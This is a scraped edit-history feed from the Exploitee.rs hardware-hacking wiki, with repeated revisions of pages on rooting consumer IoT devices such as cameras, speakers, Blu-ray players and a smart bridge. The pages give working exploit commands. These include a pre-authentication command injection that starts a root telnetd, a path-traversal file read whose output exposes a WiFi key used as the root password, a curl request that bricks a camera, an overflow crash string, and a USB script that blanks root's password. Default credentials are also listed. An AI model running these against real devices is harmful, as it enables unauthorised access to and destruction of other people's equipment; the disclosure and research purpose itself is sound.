Exploitee.rs - User contributions [en]

Tenvis T8810

2017-08-11T01:08:16Z

CJ: /* UART Root */

__FORCETOC__
{{Disclaimer}}
[[File:TENVIS_T8110.JPG|120px|left|thumb]]
[[Category:Networking]]

=Tenvis T8810=

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/Indoor-Security-Camera-Baby-Monitor/dp/B01MFBBYO8/ref=cm_cd_al_qh_dp_t?tag=exploiteers-20 Purchase the Tenvis T8810 at Amazon]

==UART Root==
The UART interface on this device is located on the main board, above the power connector [pictured], and runs at 115200, 8n1 and auto boots to a Linux kernel after a three second delay in U-Boot. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh, as seen below:

<pre style="white-space: pre-wrap;">
setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm
</pre>

<gallery>
TENVIS_T8110_UART.JPG
</gallery>

=== Demo ===
{{#ev:youtube|nxnVUVMNO5Y}}

==Remote Denial of Service==

===WARNING===

This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.

Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.

<pre style="white-space: pre-wrap;">
curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed
<pre>

Lutron L-BDG2-WH Caseta Smart Bridge

2017-08-11T01:05:30Z

CJ: /* UART */

__FORCETOC__
{{Disclaimer}}
[[File:Lutron LBDG2WH Caseta Smart Home Stock.jpg|left|thumb|160px]]
[[Category:Music Players]]

= Lutron L-BDG2-WH Caseta Smart Bridge =

The Lutron L-BDG2-WH Caseta Smart Bridge is a home automation bridge allowing you to connect Lutron devices to your home network.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/LUTRON-L-BDG2-WH-Caseta-Wireless-HomeKit-enabled/dp/B00XPW67ZM/ref=as_li_ss_tl?s=electronics&ie=UTF8&qid=1502255332&sr=8-1&keywords=Lutron+LBDG2WH+Caseta+Smart&linkCode=ll1&tag=exploiteers-20&linkId=cba7e7e286aa7acf3b2fc037bb883e08 Purchase the Lutron L-BDG2-WH Caseta Smart Bridge at Amazon]

== UART ==
The Lutron L-BDG2-WH Caseta Smart Bridge contains a UART debug port (along with JTAG) which drops to a root shell upon bootup. The pinout for the UART can be seen below.

[[File:Lutron_L-BDG2-WH_Smart_Home_UART.png|400px]]

=== Demo ===
{{#ev:youtube|ek99HRAKp4Y}}

MUZO Cobblestone

2017-08-11T01:04:42Z

CJ: /* Pre Auth Root Command Injection */

__FORCETOC__
{{Disclaimer}}
[[File:MUZO.JPG|120px|left|thumb]]
[[Category:IOT]]

=MUZO Cobblestone=

"MUZO Cobblestone is a Wi-Fi Audio Receiver that makes your speakers wireless. Now you can control music play to your speakers without having to connect your audio cable to your speakers. Cobblestone is easy to set-up. Just connect your Cobblestone to your speaker, amplifier or receiver, and configure your Cobblestone to your home Wi-Fi network with our MUZO Player app and start streaming your favorite music. It’s as easy as that. AirPlay multi-room is supported for Cobblestones and not yet supported for 3rd party Airplay devices."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/MUZO-Cobblestone-Wi-Fi-Audio-Receiver/dp/B00N9NZIKM/ref=sr_1_1?s=electronics&ie=UTF8&qid=1502258551&sr=1-1&tag=exploiteers-20 Purchase the MUZO Cobblestone at Amazon]

==Telnet Default Credentials==

The device permits logins with root permissions with the username of <code>admin</code> and password of <code>admin</code>

==Pre Authorization Root Command Injection==

A pre-authorization command injection bug exists in the main application, as the WiFi password is directly passed to a command line utility. A simple command injection via a curl request can spawn a telnet shell, as the root user with no credentials needed.

Proof of Concept:
<pre style="white-space: pre-wrap;">
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
</pre>

MUZO Cobblestone

2017-08-11T00:45:41Z

CJ: /* Telnet Default Credentials */

__FORCETOC__
{{Disclaimer}}
[[File:MUZO.JPG|120px|left|thumb]]
[[Category:IOT]]

=MUZO Cobblestone=

"MUZO Cobblestone is a Wi-Fi Audio Receiver that makes your speakers wireless. Now you can control music play to your speakers without having to connect your audio cable to your speakers. Cobblestone is easy to set-up. Just connect your Cobblestone to your speaker, amplifier or receiver, and configure your Cobblestone to your home Wi-Fi network with our MUZO Player app and start streaming your favorite music. It’s as easy as that. AirPlay multi-room is supported for Cobblestones and not yet supported for 3rd party Airplay devices."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/MUZO-Cobblestone-Wi-Fi-Audio-Receiver/dp/B00N9NZIKM/ref=sr_1_1?s=electronics&ie=UTF8&qid=1502258551&sr=1-1&tag=exploiteers-20 Purchase the MUZO Cobblestone at Amazon]

==Telnet Default Credentials==

The device permits logins with root permissions with the username of <code>admin</code> and password of <code>admin</code>

==Pre Auth Root Command Injection==

Target: /httpapi.asp

<pre style="white-space: pre-wrap;">
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
</pre>

Connect to the telnet service as root

GGMM E3 Smart Speaker

2017-08-11T00:44:52Z

CJ: /* Pre Auth Root Command Injection */

__FORCETOC__
{{Disclaimer}}
[[File:GGMME3.JPG|120px|left|thumb]]
[[Category:IOT]]

=GGMM E3 Smart Speaker=

"Enjoy the full rich sound by wirelessly streaming your favirote music to GGMM E3. E3 uses Wi-Fi/ Bluetooth 4.0 technology to equally project exquisite audio wirelessly."

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/GGMM-Speakers-Multi-Room-Bluetooth-Compatible/dp/B01E3MXHKA/ref=sr_1_1?s=electronics&ie=UTF8&qid=1502258299&sr=1-1&tag=exploiteers-20 Purchase the GGMM E3 Smart Speaker at Amazon]

==Pre-Authorization Root Command Injection==

A pre-authorization command injection bug exists in the main application, as the WiFi password is directly passed to a command line utility. A simple command injection via a curl request can spawn a telnet shell, as the root user with no credentials needed.

Proof of Concept:
<pre style="white-space: pre-wrap;">
curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed
</pre>

Connect to the telnet service as root

=== Demo ===
{{#ev:youtube|rxtb88qYanI}}

VeraEdge Smart Home

2017-08-11T00:42:01Z

CJ: /* Local File Disclosure */

__FORCETOC__
{{Disclaimer}}
[[File:VERAEDGE.JPG|120px|left|thumb]]
[[Category:Home Automation]]

=VeraEdge-US Smart Home Controller=
The VeraEdge-US is a smart home controller used for bridging smart home devices with a users WiFi network.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/Vera-Control-VeraEdge-US-Smart-Controller/dp/B00PFGJZM8/ref=as_li_ss_tl?ie=UTF8&qid=1502364546&sr=8-1&keywords=VeraEdge-US+Smart+Home+Controller&linkCode=ll1&tag=exploiteers-20&linkId=c579b21805465293a2ad7a0f2e5ee9f3 Purchase the VeraEdge-US Smart Home Controller at Amazon]

== Local File Disclosure==
VeraEdge-US Smart Home contains a Local File Disclosure via get_file.sh and store_file.sh, both which can be hit without authentication. Below you can find the code within get_file.sh.

[[File:VERAEDGE LFD ROOT.JPG]]

Unfortunately get_file requires a directory to exist which store_file conveniently creates. A POC for retrieving the file containing the devices SSID and WiFi key (/etc/cmh/cmh.conf) can be seen below.
<pre>
curl -X POST -v 'http://<DEVICEIP>/cgi-bin/cmh/store_file.sh' --data store_file=123
curl -X POST -v 'http://<DEVICEIP>/cgi-bin/cmh/get_file.sh' --data filename="../../../../../etc/cmh/cmh.conf"

ArchiveLogsOnServer=1
ESSID=mios_45026848
Password=wind72sand
HW_Key=3sMwesqBERodWW7l3mew43fsC1d3sf
</pre>

== Root SSH Access ==
Utilizing the Local File Disclosure mentioned above, one can obtain the device specific WiFi information (SSID and Password) for the device. Conveniently the WiFi Password is the same as the password for the "root" user account.

SSHing to the device, with a login of root, and the device specific password, one can obtain root privileges remotely on the device.

=== Demo ===
{{#ev:youtube|Q02ZYHT5Efo}}

Zmodo Greet

2017-08-11T00:39:18Z

CJ: /* UART */

__FORCETOC__
{{Disclaimer}}
This page will be dedicated to a general overview of descriptions and information related to The Zmodo Greet
[[File:Zmodo greet.JPG|70px|left|thumb]]
[[Category:Cameras]]

== Purchase ==
You can purchase [https://www.amazon.com/Zmodo-Greet-Smart-Video-Doorbell/dp/B014A6M4ZI/ref=as_li_ss_tl?ie=UTF8&qid=1501631152&sr=8-2&keywords=zmodo+greet&linkCode=ll1&tag=exploiteers-20&linkId=0c97588b3859a323c9d44338e9cd9374 The Zmodo Greet on Amazon].

== About ==
The Zmodo Greet is a WiFi doorbell with a camera and two way audio communication.

== Power ==
Powering this board is a bit of a challenge. It expects to be connected to a 10-36V AC source in series with a doorbell chime. Just connecting a DC source to the input doesn't work. We found the best method is to solder a connection to the DC side of the rectifier and supply a low DC voltage there (we used a 9V battery).

<gallery>
File:Zmodo Greet Power.JPG
</gallery>

== UART ==
The main board has a UART broken out to two test points on the back. During boot you can use this UART to get a U-Boot shell. Once the device has finished booting the UART presents a root busybox shell. The UART runs at 115200 baud.

<gallery>
File:Zmodo_Greet_UART.JPG
</gallery>

=== Demo ===
{{#ev:youtube|GVg_4DbbPUE}}

== Software Vulnerabilities ==
While the Zmodo Greet is in setup mode it hosts a WiFi network and accepts an HTTP request to configure the device. This HTTP request is handled by a CGI binary that has a serious buffer overflow vulnerability.

If you connect to the setup network, you can use this curl command to cause the binary to crash:

<nowiki>
curl http://<DEVICE_IP>/cgi-bin/output.cgi\?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbbb
</nowiki>

This causes the process to jump to the address 0x61616160 ("AAA`" in ASCII). With some development this could be made into a remote code execution attack. The device does have ASLR enabled, so it will take some work to make a viable payload.

<gallery>
File:Zmodo Greet Buffer Overflow.png
File:Zmodo Greet aaaaaa.png
</gallery>

Amazon Tap

2017-08-10T01:25:18Z

CJ: /* UART */

__FORCETOC__
{{Disclaimer}}
[[File:Amazon_Tap_Stock_Photo.jpg|left|thumb|160px]]
[[Category:Music Players]]

=Amazon Tap=

The Amazon Tap is a wireless bluetooth & wifi speaker featuring the "Alexa" voice assistant.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/Amazon-Tap-Portable-Wireless-Bluetooth-Speaker-with-WiFi-Alexa/dp/B01BH83OOM/ref=as_li_ss_tl?ie=UTF8&qid=1502096069&sr=8-1&keywords=amazon+tap&linkCode=ll1&tag=exploiteers-20&linkId=234a02cb2348fcb8a90c95b616f34e8b Purchase the Amazon Tap at Amazon]

== Hardware ==
* Freescale [[http://cache.nxp.com/files/32bit/doc/data_sheet/IMX6SLCEC.pdf?pspll=1 MCIMX6L8DVN10AB]] i.MX 6 SoloLite Applications Processor
* KMNJ2000ZM eMMC/DRAM
* Broadcom BCM4343

== Teardown ==
You can find an excellent teardown of the Amazon Tap at [[https://www.ifixit.com/Teardown/Amazon+Tap+Teardown/61603 ifixit.com]].

== UART ==
The Amazon Tap features UART pads that provides u-boot and kernel output, but allows for no practical input - no shells of any sort.

The UART pads can be found in the photo below, with the settings of 115200 8n1.

[[File:Amazon_Tap_UART.png|500px]]

== Gaining Bootloader Shell ==
The Amazon Tap implements a secure boot process, however a bootloader shell can be obtained by grounding the eMMC flash data pin while U-Boot is reading its own environmental variables into memory.

To access the bootloader shell.

# Connect to UART (keep your TX line disconnected!)
# Power on
# Wait for output over UART
# Ground resistor below the TP27 silkscreen
# U-Boot shell is available when presented with "=>"

The photo below illustrates the process.

[[File:Amazon Tap Flash Glitch.png|500px]]

Amazon Tap

2017-08-10T01:22:45Z

CJ: /* Gaining Bootloader Shell */

__FORCETOC__
{{Disclaimer}}
[[File:Amazon_Tap_Stock_Photo.jpg|left|thumb|160px]]
[[Category:Music Players]]

=Amazon Tap=

The Amazon Tap is a wireless bluetooth & wifi speaker featuring the "Alexa" voice assistant.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/Amazon-Tap-Portable-Wireless-Bluetooth-Speaker-with-WiFi-Alexa/dp/B01BH83OOM/ref=as_li_ss_tl?ie=UTF8&qid=1502096069&sr=8-1&keywords=amazon+tap&linkCode=ll1&tag=exploiteers-20&linkId=234a02cb2348fcb8a90c95b616f34e8b Purchase the Amazon Tap at Amazon]

== Hardware ==
* Freescale [[http://cache.nxp.com/files/32bit/doc/data_sheet/IMX6SLCEC.pdf?pspll=1 MCIMX6L8DVN10AB]] i.MX 6 SoloLite Applications Processor
* KMNJ2000ZM eMMC/DRAM
* Broadcom BCM4343

== Teardown ==
You can find an excellent teardown of the Amazon Tap at [[https://www.ifixit.com/Teardown/Amazon+Tap+Teardown/61603 ifixit.com]].

== UART ==
The Amazon Tap features UART pads that provides u-boot and kernel output, but allows for no practical input - no shells of any sort.

The UART pads can be found in the photo below.

[[File:Amazon_Tap_UART.png|500px]]

== Gaining Bootloader Shell ==
The Amazon Tap implements a secure boot process, however a bootloader shell can be obtained by grounding the eMMC flash data pin while U-Boot is reading its own environmental variables into memory.

To access the bootloader shell.

# Connect to UART (keep your TX line disconnected!)
# Power on
# Wait for output over UART
# Ground resistor below the TP27 silkscreen
# U-Boot shell is available when presented with "=>"

The photo below illustrates the process.

[[File:Amazon Tap Flash Glitch.png|500px]]

Amazon Tap

2017-08-10T01:21:04Z

CJ: /* UART */

__FORCETOC__
{{Disclaimer}}
[[File:Amazon_Tap_Stock_Photo.jpg|left|thumb|160px]]
[[Category:Music Players]]

=Amazon Tap=

The Amazon Tap is a wireless bluetooth & wifi speaker featuring the "Alexa" voice assistant.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/Amazon-Tap-Portable-Wireless-Bluetooth-Speaker-with-WiFi-Alexa/dp/B01BH83OOM/ref=as_li_ss_tl?ie=UTF8&qid=1502096069&sr=8-1&keywords=amazon+tap&linkCode=ll1&tag=exploiteers-20&linkId=234a02cb2348fcb8a90c95b616f34e8b Purchase the Amazon Tap at Amazon]

== Hardware ==
* Freescale [[http://cache.nxp.com/files/32bit/doc/data_sheet/IMX6SLCEC.pdf?pspll=1 MCIMX6L8DVN10AB]] i.MX 6 SoloLite Applications Processor
* KMNJ2000ZM eMMC/DRAM
* Broadcom BCM4343

== Teardown ==
You can find an excellent teardown of the Amazon Tap at [[https://www.ifixit.com/Teardown/Amazon+Tap+Teardown/61603 ifixit.com]].

== UART ==
The Amazon Tap features UART pads that provides u-boot and kernel output, but allows for no practical input - no shells of any sort.

The UART pads can be found in the photo below.

[[File:Amazon_Tap_UART.png|500px]]

== Gaining Bootloader Shell ==
The Amazon Tap implements a secure boot process but a bootloader shell can be obtained by grounding the flash data0 pin while u-boot is reading the kernel into memory.

To access the bootloader shell.

# Connect to UART
# Ground resistor next to TP27 silkscreen
# u-boot shell is available when presented with "=>"

The photo below illustrates the process.

[[File:Amazon Tap Flash Glitch.png|500px]]

LG BP530

2014-08-11T23:39:59Z

CJ: /* Exploitation */

__FORCETOC__
{{Disclaimer}}
[[File:LG-BP530.jpg|200px|left|thumb]]
[[Category:Blu-Ray Players]]
This page will be dedicated to a general overview, descriptions, and information related to the LG BP530 Blu-Ray player.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[http://www.amazon.com/LG-Electronics-BP530-Blu-ray-Player/dp/B00BD7UVKI?tag=gtvcom-20 Purchase the LG BP530 Blu-Ray Player at Amazon]

== GPL ==
You can find GPL code for the [https://www.lg.com/global/support/opensource/opensourceList?types=NAME&search=BP530 LG BP530 Here]

== Exploitation ==
A bug exists in the MTK supplied SDK which affects many Blu-Ray players, including the BP530.

The main binary, which controls all aspects of the player has leftover debug instructions for the VUDU app. When the VUDU app is run, if a file exists named "vudu.txt" , in a directory labeled "vudu" on a FAT formatted flash drive it will attempt to execute "vudu/vudu.sh", and deletes vudu.txt. It runs this sh as root. Using the commands below, you can spawn a root telnet shell, allowing access to the device:

*Create a folder named "vudu" on a FAT formatted flash drive.
*Inside that folder, create a blank file named "vudu.txt"
*Also in that folder, create a file named "vudu.sh" containing the following:
<pre>
#!/bin/sh

echo "executing" > /mnt/sda1/vudu.txt
mount -t overlayfs -o overlayfs /etc/passwd
echo "root::0:0:root:/root:/bin/sh" > /etc/passwd

/mnt/rootfs_normal/usr/sbin/telnetd

</pre>
*Start the player with the flash drive plugged in, and execute the VUDU app. The code has been executed, and a telnet shell now exists for you to connect to on port 23 as root. Following this, you will be brought back to the main menu.

Sony BDP-S5100

2014-08-11T23:39:42Z

CJ:

__FORCETOC__
{{Disclaimer}}
[[File:Sony-bdp-s5100-multi-region-blu-ray-dvd-player.jpg|200px|left|thumb]]
[[Category:Blu-Ray Players]]
This page will be dedicated to a general overview, descriptions, and information related to the Sony BDP-S5100 Blu-Ray player .

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[http://www.amazon.com/Sony-BDP-S5100-Blu-ray-Player-Wi-Fi/dp/B00AWKC0JM?tag=gtvcom-20 Purchase the Sony BDP-S5100 Blu-Ray Player at Amazon]

== GPL ==
You can find GPL code for the [http://www.sony.net/Products/Linux/Video/BDP-S1100.html Sony BDP-S5100 Here]

== Exploitation ==
A bug exists in the MTK supplied SDK which affects many Blu-Ray players, including the BDP-S5100.

The main binary, which controls all aspects of the player has leftover debug instructions for the VUDU app. When the VUDU app is run, if a file exists named "vudu.txt" , in a directory labeled "vudu" on a FAT formatted flash drive it will attempt to execute "vudu/vudu.sh", and deletes vudu.txt. It runs this sh as root. Using the commands below, you can spawn a root telnet shell, allowing access to the device:

*Create a folder named "vudu" on a FAT formatted flash drive.
*Inside that folder, create a blank file named "vudu.txt"
*Also in that folder, create a file named "vudu.sh" containing the following:
<pre>
#!/bin/sh

echo "executing" > /mnt/sda1/vudu.txt
mount -t overlayfs -o overlayfs /etc/passwd
echo "root::0:0:root:/root:/bin/sh" > /etc/passwd

/mnt/rootfs_normal/usr/sbin/telnetd

</pre>
*Start the player with the flash drive plugged in, and execute the VUDU app. The code has been executed, and a telnet shell now exists for you to connect to on port 23 as root. Following this, you will be brought back to the main menu.

LG Smart Refrigerator (LFX31995ST)

2014-08-11T23:34:10Z

CJ: /* Exploitation */

__FORCETOC__
{{Disclaimer}}
[[File:LFX31995ST.jpg|200px|left|thumb]]
[[Category:Refrigerators]]
This page will be dedicated to a general overview, descriptions, and information related to the LG Smart Refrigerator (LFX31995ST).

== Pinouts ==

<gallery>
file:LG Refrigerator EMMC pinout.jpg|EMMC Pinout
file:LG Refrigerator UART pinout.jpg|UART Pinout
</gallery>

== Exploitation ==
The LG Smart Refrigerator features two ways to gain privileges:

1: Connecting to the UART pinout above will drop you to a root shell when booted. From here, you can connect a USB flash drive to the device, and copy a secondary launcher to the system. Use the new one, from there you can launch a root shell utilizing the built in development tools.

2: Soldering the EMMC flash will allow you to copy a new launcher to the system partition. After rebooting the system the Android system will ask which launcher you wish to use. Use the new one, from there you can launch a root shell utilizing the built in development tools.

EMMC refers to an Embedded Multi-Media Card which has native Linux support. This means it works just like an SD card, and for our purposes, just filesystem access. Error Correcting Code and Out of Bounds data, which are usually a large hassle with NAND flash memory is handled in hardware, and is transparent, which makes it easier for reading and writing.

Although eMMC memory can have 9 Pins (VCC, VSS, CMD, CLK, DAT0-DAT4) it can also operate on SPI / Single Bit mode using only 1 DAT line. In short, reading/writing an eMMC chip can be done with only 5 wires, which does not require specialized hardware or software tools.

Required Minimum Connections: VCC, VSS, CMD, CLK, DAT0 (These lines all normally accessible via SMD resistors) GTVHacker recommends using a device like the SD Card Sniffer from Sparkfun to interface between your SD card reader, and the flash. By adding pins to the SD Card sniffer board, it facilitates easy analysis of the correct pinout, and also reduces the risk of damage due to repeated soldering to your SD card reader.

The LG Smart Refrigerator utilizes an EMMC flash. Using the pinouts above, you can connect the flash to a SD card reader, and rewrite it's contents.

For the LG Smart Refrigerator device specifically, you can mount the /system partition, which is EXT4. From here, copy a stock Android 2.3 launcher into system. The Refrigerator has a built in interactive shell, under debug settings. This will allow for root access via said shell and further examination of the system internals.

Netgear Push2TV (PTV3000)

2014-08-11T23:29:47Z

CJ: /* Exploitation */

__FORCETOC__
{{Disclaimer}}
[[File:NetgearPush2TV.jpg|200px|left|thumb]]
[[Category:Media Players]]
This page will be dedicated to a general overview, descriptions, and information related to the Netgear Push2TV.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[http://www.amazon.com/gp/product/B00904JILO/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=B00904JILO&linkCode=as2&tag=gtvcom-20&linkId=TZYDPVXAW3YVMF7N Purchase the Netgear Push2TV at Amazon]

== Pinout ==
<gallery>
File:Push2tv-uart.jpg
</gallery>

== Exploitation ==

There are multiple vulnerabilities in the Netgear Push2TV (PTV3000)

